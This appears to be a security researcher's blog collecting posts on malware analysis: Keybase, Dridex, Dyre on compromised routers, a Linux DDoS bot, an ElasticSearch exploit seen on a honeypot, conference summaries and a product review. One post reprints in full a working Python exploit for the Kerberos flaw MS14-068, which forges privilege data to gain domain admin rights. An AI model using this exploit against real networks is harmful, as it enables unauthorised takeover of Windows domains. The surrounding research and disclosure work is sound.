Keybase Malware

I have recently analysed a sample of what appears to be a newer version of Keybase

Having been delivered as an executable inside a zip, the malware has the usual key logging capabilities as most trojans, utilising native API calls to hook keyboard processes and using HTTP to upload images of the desktop, the victims in this instance are being uploaded to a server which isn't as tightly managed as usual.

Here is the web panel 

Panel

Here are the uploaded screenshots, appended with date and times.

Uploads

Here are some screenshots of applications in use on the victims machines.

Skype

Someone about to do some online banking, which will capture keystrokes as well as the capability to take screenshots.

Banking

Someone placing an order for some materials via Outlook.com

Materials

We can see encoded in the HTTP stream the inclusions of specific keywords including, notepad which i launched and keystrokes included in the request to the C&C uploading the screenshots.

Traffic


#Dridex leverages known CVE's

Recent analysis of a Dridex sample has evidence of two hard coded references to CVE's below the elevation code for .sdb abuse.

 

Internal code references to two known RCE vulnerabilities in Windows.

Probably another method of bypassing UAC now that Microsoft patched the .sdb abuse method first noticed in February and noted by CERT-JP

Update : Compromised AirOS Routers being used by #Dyre

Updated to include comments from Ubiquti.

Dyre/Dyreza has gotten some attention this week in relation to targeting banks, after tracking Dridex and other associated banking Trojans I've researched parts of the command and control infrastructure that is abused by Dyre/Dyreza. 

Dridex uses compromised sites for payload delivery, Upatre & Emotet do similar things, Dyre/Dyreza are using compromised routers.

I analysed Dyre/Dyreza samples upon infection are seeking to communicate with with a lot of compromised AirOS router's within the botnet.

Dyre

Not only AirOS is affected by Dyre/Dyreza.

RouterOS MicroTiK

Recently, i recall reading on Krebs blog, that Lizard squads DDOS platform ran via using backdoors on compromised routers. If this vector is using brutceforcing of potentially weak usernames and passwords in the same way Lizard squad did, or via a backdoor that ships with the routers for firmware upgrades remains to be seen.

Update 8/7/15

Comments from Brian Krebs here

Ubiquti gave the following statement

We did disable remote management by default, and took a lot of flack from our users, so we reverted it.

You should inform the ISP about this router, so they can contact the user.
— http://community.ubnt.com/t5/Installation-Troubleshooting/Attack-Malware/m-p/1289182#M83622

Admitting it previously shipped with RM disabled and then enabling it as a result of feedback seems strange. The threat it poses far outweighs the benefits of enabling it.

#Dridex reaches full SSL capability

Dridex today reached full SSL capabilities for the communication to the  'Supernodes', a few samples analysed today showed pure SSL traffic connectivity to peer nodes in the botnet, this was something that I feared was evolving considering the active checking of modern sandbox analysis, today this gives Dridex the ability to hide in SSL traffic &  the threat posed by this is three fold

  1. SSL traffic is a legal, and political minefield, SSL interception even more.
  2. Companies at risk of spam campaigns are obligated to identify, and mitigate the traffic giving credence to the risk it poses, research can't be done without intercepting SSL traffic. 
  3. Smaller companies who do not possess the financial, legal or technical abilities to intercept SSL traffic will not be able to cope with the already advanced threat.

Dridex campaigns are also spreading further into the EU with CERT FR today posting an alert in relation to the campaigns actively targeting France

Dridex Botnet 220, 125 & 120 are now the number one risk posed to businesses that use email as means of communications, the success rates and high turnover in terms of IP infrastructure associated with Dridex make it clear that it's successful tool for criminals.

Whilst everything is being done to monitor backdoors, these threats are coming in through the front door.

 

 

#ElasticSearch & CVE-2015-1427

Actively being exploited as reported by Kaspersky  i saw this recently against one of my honeypots which is CVE-2015-1427

Logs

The highlighted area loads this shell script 

Payola?


I wonder who, 'mgrey1110@gmail.com' is?


#Dridex & Anti Virtualisation detection

Dridex seems to be the most prevalent form of Malware targeting businesses, since the turn of the year i've thrown some numbers around about how Dridex is 

  • Targeting the UK Retail & Finance industry
  • Evolved using PowerShell (Platform dependant)
  • Uses rudimentary encryption (ROT13) to attempt to avoid analysis

A newer twist to Dridex is the ability to attempt to circumnavigate some commercial virtualisation. Here is a snippet from one of the samples freely available on Malwr.com or via the excellent hybrid-analysis.com

Screen Shot 2015-03-14 at 10.29.41.png

I could see once the sample was detonated it would drop %temp% files and in the temp files are the configuration details for the sample its currently detonating, it is explicitly attempting to detonate on 'tin', for lack of a better phrase. Didier had encountered this sample, and came to the same conclusion as me. 

I prefer to inspect the malicious word document via python scripts than to detonate it in a sandbox.

I again refer to the excellent BotConf i attended in December and  talk from Paul Jung discussing sandbox detection

When inspecting the malicious documents i highly recommend http://www.decalage.info/ an the olevba.py scripts which can not only dump the macro and read encoded base64 strings, but will prettify the content into tables for 'reporting'.

Screen Shot 2015-03-14 at 10.57.45.png




#Dridex - A closer look at the numbers

Ive been monitoring this campaign for a while, and of course there are enough educational posts on it available. 

None of these blogs offer much in the way of intelligence around what the malware does, they are very technical and for that reason serve a higher purpose.

I respond better to visual information rather than a wall of text, over a period of 6 weeks i saw a number of complex campaigns, Dridex is evolving utilising PowerShell in stages, having previously used batch scripting to execute. 

Delivering Word documents, or Excel and even this week simple xml, not encrypted as such, but obfuscated with various methods.

Mitigation is easy, disable macros. Educate your users - they are the biggest threat, and also the biggest allies, they have the ability to educate you on the final stage, which in some respects is your blind spot - when a new attack vector is launched, the user is the beta tester for your company and for the threat actor.

Install some good QA in them, if nothing else.


Dridex Infograph

 

A short video of information being sent to a server with the /cashflow url 






Chinese ELF #DDoser AKA '#LinuxBillGates' Cameo on iPad

A Reddit user posted a query about finding some suspect files on his Jailbroken iPad in the Jailbreak subreddit over the weekend. 

Mirror - http://www.freezepage.com/1423511994JWXKRPVBDF

Original - http://www.reddit.com/r/jailbreak/comments/2v473a/new_ios_virus/

This is the same piece of 'malware' i discovered that was present on Windows previously, originally found infecting Linux - This has now found it's way in some capacity onto iOS.

That makes this present not only Linux & Windows, but now iOS. Phil Schiller recently exclaimed '1 Billion iOS devices shipped!!' in their most recent earnings call.

According to Jay Freeman the curator of Cydia said there was 18m devices jailbroken. This was on iOS6 - almost 2 years ago.

Given the remarkable sales growth, the figure of jailbroken devices ≠ result in a similar rate of devices shipped but it's possibly higher considering the success in China Apple is having. It's not unfair to suggest its growing quicker given the two most recent Jailbreaks are both of Chinese origin.

This is a interesting piece of 'malware' for a number of reasons.

  • Devices are as insecure as they have ever been on iOS once jailbroken
  • The growth in the ELF variant continues to grow, and port to different platforms
  • The DDOS element of the BillGates combination of potential jailbroken devices makes me think of this talk from BotConf

I suggested to Ruchna who wrote the linked paper about the feasibility of Mobile DOS attacks in 2015 - maybe this is an indication.

 

Thanks to Benkow for his assistance in identifying BillGates.

#Invincea : FreeSpace & Cynomix

Invincea

I've had a couple of days to play with Invincea 'Freespace' and i believe this could be a contender to join the coalition in killing or at least challenging traditional AV, a battle which is growing long in the tooth.

FreeSpace is the client technlogy behind the corporate name of Invicea and is a combination of a 3 tier platform of client, server and cloud - of which the 'Cloud' platform is a community source of collated threats analysed by Invincea and then correlated with the intelligence or the ' Threat Data ' gathered by the 'Managment Server ' which links to Threatgrid intelligence also.

Management Server

This is where i managed the reporting and samples submitted. FreeSpace captures the forensics information and its fed to the Management server where i viewed the following :

  • Full auditing of all changes
  • Backup and restore 
  • Dashboards & reporting
  • Timelines of attacks
  • Registry changes
  • Processes launched
  • Inbound & outbound connectivity
  • Infection sources ( GeoIP )

There is optional vendor integration with Splunk, ArcSight, McAfee ePO & iSight as well as others.

FreeSpace

The client part of the solution works on a 'Secure Virtual Container' technology,its enevitable that both Bromium & Invincea will be discussed when mentioning this technology, they are in the same ' user space ' separated only by vendor buzz words. Invincea do not present this technology as a 'silver bullet'. Some Enterprises are still adapting to VDI - i can't imagine this being an easy sell despite the glaring technical benefits.

Image courtesy of Invincea

FreeSpace

FreeSpace sits on the client, and has application support for :

  • PDF
  • Flash
  • Microsoft Excel, Word, Powerpoint & Outlook 'Helper' apps 2010,2013
  • Silverlight
  • Java 1.6 1.7+

It also has OS support for 

  • Windows XP x86
  • Windows 7 x86 & x64
  • Windows 8 & 8.1 x86 & x64

I tested FreeSpace on a SP1 version of x64 Windows 7 

FreeSpace v malicious Flash serving website

Invincea works on 4 distinct principles

- Containment, Invincea creates a virtual sandbox which exists on the desktop
- Detection, A behaviorial detection engine monitors the sandbox to spot any malicious behavior
- Breach Prevention, Malicious activity when detected, is captured inside the sandbox
- Intelligence, All 'unauthorised' attacks are uploaded to the Invincea Management Server

Invincea provided me a Linux Virtual machine with contains the Cynomix command line tools for investigating forensic level analysis of some samples, similar in the respects to Didier Stevens tools in parsing and interrogating the samples. The ability to submit samples does not require an active internet connection according to Invincea, critically this helps in ensuring some confidentiality in analysing threats in the respect of deciding whether it may be a campaign or not.

The web front end is an attractive collection of intelligence, including string analysis and .dll capabilities displayed out and correlated with similar threats.

The back end Cynomix Virtual Machine is command line driven and includes capabilities which 'drive' the web front end.

  • Cycrowd - Correlates languages discovered in samples strings to 'predict' capabilities a sample has
  • Cysig - Critically, this generates a Yara signature for malware samples using a statistical method that allows invincea to include in the signature based on rarity
  • Cynet - a network tool used to identify and visualize relationships between malware samples based on the string relationships

Example of a sample being analysed by Cycrowd 

Summary

Having used it for little over a week, i can't help but think that modern AV has to fear technologies like this, the only challenge Bromium & Invincea have is integration with modern platforms. An example is a Co.  still adopting VDI as a solution will find this a step too far, modern AV sits in a long line of settled and comfortable adoptees IE: HP Partner supplied their laptops with Symantec, Dell promote AVG, SonicWall & Trend Micro.

Consumers - Commercial and private don't know any better than to choose one AV over another, why should they then proceed to choose a 'Microvisor' - This is the challenge.

AV is everywhere including at home, office, smartphone - this is something that is a growing technical achievment along with other vendors in virtualisation such as AppSense - it's a a difficult market to break down, but in the long run AV has a competitor, and thats good for users.

#BotConf 2014 Summary

I attended along with a couple of colleagues the massively successful and informative conference regarding a number of topics including ;

  • Botnets
  • DNS analysis
  • Static analysis of Malware
  • Landscape threats 
  • Legal implications
  • Vendor perspectives
  • Government & CERT challenges

Hosted by Eric Freyssinet the event was over 3 days in Nancy, a number of well respected community gave talks on the current and past challenges faced. I've summarised some of the ' stand out', for me talks. These are a personal preference!  A full list is available.

Day 1. NCA, UK.

The first day consisted of some content related to challenges faced by UK Law enforcement in relation to Botnets including, ' ZeuS', the biggest Botnet and one to gain both multinational as well as community attention.  The National Crime Agency gave some interesting insight ( and techniques!) into how they investigated and 'took down' the variant.

The NCA demonstrated some excellent coordination with other parties in what was considered a landmark achievement crossing 'domains' of not only political, metaphysical and personal constraints. A genius moment was described in deciphering the algorithm used in the DGA which allowed the NCA to eventually defeat the purchase of further domains.

This resulted in a national programme of awareness and a new website driving home the size of the challenge faced, not only to commercial users but for the first time in the UK to home users a campaign which was demonstrated across TV, Radio and online.

Day 2,  Mark Arena Intel 471

A really excellent and insightful look into the dark world of deception and stunning use of combining a 'nose' for a scent and OSINT by Mark who was tasked with resolving the theft of a Bitcoin wallet transaction - a lot of what was discussed was and still is understandably redacted  - his use of OSINT and ability to use the tools at his disposal demonstrated the lack of anonymity of the crypto currency provides.

Mark continued with a demonstration on 'doxing' the accused, and attribution although was never committed 100%, the evidence discussed was impressive.

 

Day 3,  Dhia Lite OpenDNS 

Dhia, an OpenDNS employee demonstrated in depth the capabilities provided by using OpenDNS. DNS as discussed is a critical part of a botnet infrastructure and provides insight into the behavior which is sometimes missed due to political reasons in commercial areas.

The concept of 'Fast Flux' domains is not a new one, its been used in many large scale crime botnets to quickly distribute domains to botnets, we first saw the ability of Fast Flux in ZeuS.

Dhia demonstrated the technical details of what the OpenDNS project does and was able to extract some massive data regarding ZeuS.

  • ASN's
  • TTL's
  • Geo distribution
  • IP information

Some excellent work being done in relation to botnet analysis by OpenDNS, its time for Google DNS to do the same.

All the talks,papers and associated materials being progressively uploaded to here. Thanks to all the speakers, attendees and organisers.

 

Next years conference has already been announced for December 2015

Exploit for CVE-2014-6324

SANS adjusted their original rating &  gave this vulnerability a 'critical rating

Given the mitigation is 'the attacker must possess valid domain credentials' to launch this attack, this is a moot point given the exploit. I found this blog post the most informative in relation to understanding the ticket granting process to launch this exploit.

Courtesy of Sylvain Monne, this python script exploits the vulnerability in Kerberos.

#!/usr/bin/python

# MS14-068 Exploit

# Author
# ------
# Sylvain Monne
# Contact : sylvain dot monne at solucom dot fr
# http://twitter.com/bidord

 

import sys, os
from random import getrandbits
from time import time, localtime, strftime

from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
from kek.crypto import generate_subkey, ntlm_hash, RC4_HMAC, HMAC_MD5
from kek.krb5 import build_as_req, build_tgs_req, send_req, recv_rep, \
    decrypt_as_rep, decrypt_tgs_rep, decrypt_ticket_enc_part, iter_authorization_data, \
    AD_WIN2K_PAC
from kek.pac import build_pac, pretty_print_pac
from kek.util import epoch2gt, gt2epoch


def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host,
           output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None):

    sys.stderr.write('  [+] Building AS-REQ for %s...' % kdc_a)
    sys.stderr.flush()
    nonce = getrandbits(31)
    current_time = time()
    as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False)
    sys.stderr.write(' Done!\n')
    
    sys.stderr.write('  [+] Sending AS-REQ to %s...' % kdc_a)
    sys.stderr.flush()
    sock = send_req(as_req, kdc_a)
    sys.stderr.write(' Done!\n')

    sys.stderr.write('  [+] Receiving AS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')

    sys.stderr.write('  [+] Parsing AS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
    session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue']))
    logon_time = gt2epoch(str(as_rep_enc['authtime']))
    tgt_a = as_rep['ticket']
    sys.stderr.write(' Done!\n')


    if krbtgt_a_key is not None:
        print >> sys.sdterr, as_rep.prettyPrint()
        print >> sys.stderr, as_rep_enc.prettyPrint()
        ticket_debug(tgt_a, krbtgt_a_key)
    
    sys.stderr.write('  [+] Building TGS-REQ for %s...' % kdc_a)
    sys.stderr.flush()
    subkey = generate_subkey()
    nonce = getrandbits(31)
    current_time = time()
    pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time))
    tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name,
                            tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False)
    sys.stderr.write(' Done!\n')

    sys.stderr.write('  [+] Sending TGS-REQ to %s...' % kdc_a)
    sys.stderr.flush()
    sock = send_req(tgs_req, kdc_a)
    sys.stderr.write(' Done!\n')

    sys.stderr.write('  [+] Receiving TGS-REP from %s...' % kdc_a)
    sys.stderr.flush()
    data = recv_rep(sock)
    sys.stderr.write(' Done!\n')

    sys.stderr.write('  [+] Parsing TGS-REP from %s...' % kdc_a)
    tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey)
    session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue']))
    tgt_b = tgs_rep['ticket']
    sys.stderr.write(' Done!\n')


    if trust_ab_key is not None:
        pretty_print_pac(pac[1])
        print >> sys.stderr, tgs_rep.prettyPrint()
        print >> sys.stderr, tgs_rep_enc.prettyPrint()
        ticket_debug(tgt_b, trust_ab_key)


    if target_service is not None and target_host is not None and kdc_b is not None:
        sys.stderr.write('  [+] Building TGS-REQ for %s...' % kdc_b)
        sys.stderr.flush()
        subkey = generate_subkey()
        nonce = getrandbits(31)
        current_time = time()
        tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name,
                                tgt_b, session_key2, subkey, nonce, current_time)
        sys.stderr.write(' Done!\n')

        sys.stderr.write('  [+] Sending TGS-REQ to %s...' % kdc_b)
        sys.stderr.flush()
        sock = send_req(tgs_req2, kdc_b)
        sys.stderr.write(' Done!\n')

        sys.stderr.write('  [+] Receiving TGS-REP from %s...' % kdc_b)
        sys.stderr.flush()
        data = recv_rep(sock)
        sys.stderr.write(' Done!\n')

        sys.stderr.write('  [+] Parsing TGS-REP from %s...' % kdc_b)
        tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey)
        sys.stderr.write(' Done!\n')

    else:
        tgs_rep2 = tgs_rep
        tgs_rep_enc2 = tgs_rep_enc

    sys.stderr.write('  [+] Creating ccache file %r...' % output_filename)
    cc = CCache((user_realm, user_name))
    tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2)
    cc.add_credential(tgs_cred)
    cc.save(output_filename)
    sys.stderr.write(' Done!\n')


    if target_key is not None:
        print >> sys.stderr, tgs_rep2.prettyPrint()
        print >> sys.stderr, tgs_rep_enc2.prettyPrint()
        ticket_debug(tgs_rep2['ticket'], target_key)


# Pretty print full ticket content
# Only possible in a lab environment when you already know krbtgt and/or service keys
def ticket_debug(ticket, key):
    try:
        ticket_enc = decrypt_ticket_enc_part(ticket, key)
        print >> sys.stderr, ticket.prettyPrint()
        for ad in iter_authorization_data(ticket_enc['authorization-data']):
            print >> sys.stderr, 'AUTHORIZATION-DATA (type: %d):' % ad['ad-type']
            if ad['ad-type'] == AD_WIN2K_PAC:
                pretty_print_pac(str(ad['ad-data']))
            else:
                print >> sys.stderr, str(ad['ad-data']).encode('hex')
    except Exception as e:
        print 'ERROR:', e


if __name__ == '__main__':
    from getopt import getopt
    from getpass import getpass

    def usage_and_exit():
        print >> sys.stderr, 'USAGE:'
        print >> sys.stderr, '%s -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>' % sys.argv[0]
        print >> sys.stderr, ''
        print >> sys.stderr, 'OPTIONS:'
        print >> sys.stderr, '    -p <clearPassword>'
        print >> sys.stderr, ' --rc4 <ntlmHash>'
        sys.exit(1)

    opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4='])
    opts = dict(opts)
    if not all(k in opts for k in ('-u', '-s', '-d')):
        usage_and_exit()

    user_name, user_realm = opts['-u'].split('@', 1)
    user_sid = opts['-s']
    kdc_a = opts['-d']

    if '--rc4' in opts:
        user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
        assert len(user_key[1]) == 16
    elif '-p' in opts:
        user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
    else:
        user_key = (RC4_HMAC, ntlm_hash(getpass('Password: ')).digest())

    target_realm = user_realm
    target_service = target_host = kdc_b = None
    filename = 'TGT_%s@%s.ccache' % (user_name, user_realm)

    user_realm = user_realm.upper()
    target_realm = target_realm.upper()

    sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)

#BotConf 2014

I'm currently attending a conference in Nancy, France which has academic researchers, security contributions and Vendor support ( Google, Splunk & Anubis ) I'll provide a write up once the conference is complete.

 

https://www.botconf.eu/

OSX Yosemite Spotlight searches

Search queries now use the internet, as well as local indexes to search. However.. These searches are initiate a /GET to api.smoot.apple.com with the contents of the searches.

 

GET /search?q=Spotlight+Hello&locale=en-&time_zone=GMT/&calendar=gregorian&key=andromeda HTTP/1.1
Host: api.smoot.apple.com
Connection: keep-alive
Accept-Charset: utf-8
Accept: */*
X-Apple-UI-Scale: 1.000000
X-Apple-CachedResults: []
X-Apple-UserGuid: 267af341-df6c-4eed-5e78-a2b8a49a1d1f
User-Agent: (OS X 14A389) Spotlight/916
Accept-Language: en-us
Accept-Encoding: gzip, deflate
X-Apple-CachedQueries: []

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=300
Content-Type: application/json; charset=utf-8
Date: Sat, 18 Oct 2014 11:23:33 GMT
Content-Length: 436
Connection: close

[{"status":"NO_RESULTS","query":"Spotlight Hello","prefix":"Spotlight Hello","completion_score":189999,"fbq":"eyJ1IjoiMjY3YWYzNDEtZGY2Yy00ZWVkLTVlNzgtYTJiOGE0OWExZDFmIiwicCI6IlNwb3RsaWdodCBJbmNlcHRpbyIsInEiOiJTcG90bGlnaHQgSW5jZXB0aW8iLCJ0cyI6MTQxMzYwODMxMywiZyI6InVzL2lsbGlub2lzL2Nvb2svY2hpY2FnbyIsImEiOiJzcG90bGlnaHQiLCJkIjoibWFjIiwibCI6ImVuX1VTIiwiaSI6IjE0MzQ0MS0xLDIxIiwiYyI6IjQxLjg2NDMsLTg3LjY0NSIsImVjdiI6MCwiY2N2IjowfQ=="}]

Windows 'IptabLeX Botnet Ddoser'

As discovered last week, a variant of the original is now infecting Windows machines. The CNC is on another site which is hosting a http:/..../getsetup.exe and then this spawns 2 versions of getsetup.exe

The site mentioned in the Anubis report is carrying the payload and delivering a executable which then installs the 2 windows services.

It's worth mentioning at this point that the CNC and domains are all listed here are present in the Windows version too, an initial query to the following dns.dsaj2a.com is made, i did not observe any further operations.

Anubis report mentions in detail the actions carried out & the researchers over at Malware Must die have today confirmed this here & here

Here is my Cuckoo analysis - which shows the infection.

Thanks to @malwaremustdie for their original investigations on the Linux variant.

Mac OSX 'iWorm'.

A very alarmist and misleading title from a web firm, 

'' New Mac OS X botnet discovered "

Labelled as botnet, yet named as a 'worm'. What's interesting is the directory in which it allegedly drops into a JavaW directory, one assumes you may need to have Java installed*

Here is a link how to protect yourself, or an alternative.

All in all, not much investigation into the actual worm, no information on how it propagates either.

 

*I do not 

Splunk Panels & CSS fun

I was given an requirement to deliver an analytics engine to display multiple sources of known Bad IP and domains in a somewhat attractive fashion, i am using LogRhythm for some of the metrics & Splunk for others.

The only issue with Splunk is the OOB configuration is quite bland, and comes with some quite simple CSS & HTML, but i didn't have the time to change these. The best solution is to install the Splunk 6.1 Example dashboards, and clone the 'Dark Panel'. 

With some minor CSS changes, we can edit it to mimic the colours of the LogRhythm panel. i simply used Firebug for Mozilla and tracked the CSS and HTML.

 

Titan Internet multiple XSS

I've attempted to make them aware of the the multiple (11) XSS that are confirmed active on their hosting site, which include the transactional parts of the website including billing. I did disclose this to them over 4 days ago with no answer.

This is a claim from their 'vulnerability scan'.

  • 'On September 14, 2011 secure-gateway.titaninternet.co.uk met the PCI data security requirements by passing a SecurityMetrics® Site Certification vulnerability scan.'

If you're a customer of this hosting company i would ask you to question whether they are conscious of this & what steps they are doing to protect the data they are holding.

OSX & 2fa thoughts

Apple will release a new version of OSX & iOS in the final Q of 2014, one of the features is the unification of SMS and subsequent delivery via OSX & iOS. This poses some interesting scenarios on the ability to maintain 2fa with such services as Google

Google provide the ability to authenticate via a SMS to a chosen telephone number, of course the password is still required but this brings a potential new attack vector.